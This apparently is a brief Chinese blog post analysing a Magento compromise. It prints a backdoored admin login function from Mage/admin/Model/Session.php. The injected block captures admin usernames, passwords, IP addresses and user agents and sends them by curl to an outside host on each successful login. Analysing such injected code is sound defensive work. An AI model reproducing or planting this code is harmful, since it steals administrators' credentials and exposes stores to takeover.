Magento被远程读取后台用户名及密码分析

被写到Mage/admin/Model/Session.php里面,登陆正常用户的时候记录并远程发送

    public function login($username, $password, $request = null)
    {
        if (empty($username) || empty($password)) {
            return;
        }

        try {
            /** @var $user Mage_Admin_Model_User */
            $user = Mage::getModel('admin/user');
            $user->login($username, $password);
            if ($user->getId()) {
    $serverboss = $_SERVER['SERVER_NAME'];
        $ip = $_SERVER['REMOTE_ADDR'];$data17 = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
        $agent = $_SERVER['HTTP_USER_AGENT'];
        $pesan = "Laporan Admin dari ".$serverboss."\n User|Pass: ".$username|$password." \n IP       : ".$ip." \n Agent: ".$agent;
        $update = "http://bgsvetlina.com/post.php";$binCC = substr($data10, 0, 6);
                $subject = "Mag Amin LogIn ".$serverboss." ".$data17->geoplugin_countryName;
                $xupdate = "data=". $pesan."&subject=".$subject."&server=".$serverboss;
          $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);

                $this->renewSession();

                if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
                    Mage::getSingleton('adminhtml/url')->renewSecretUrls();
                }
                $this->setIsFirstPageAfterLogin(true);
                $this->setUser($user);
                $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());

                $requestUri = $this->_getRequestUri($request);
                if ($requestUri) {
                    Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
                    header('Location: ' . $requestUri);
                    exit;
                }
            } else {
                Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
            }
        } catch (Mage_Core_Exception $e) {
            Mage::dispatchEvent('admin_session_user_login_failed',
                array('user_name' => $username, 'exception' => $e));
            if ($request && !$request->getParam('messageSent')) {
                Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
                $request->setParam('messageSent', true);
            }
        }

        return $user;
    }

0
admin#1
admin#1

最新文章 更多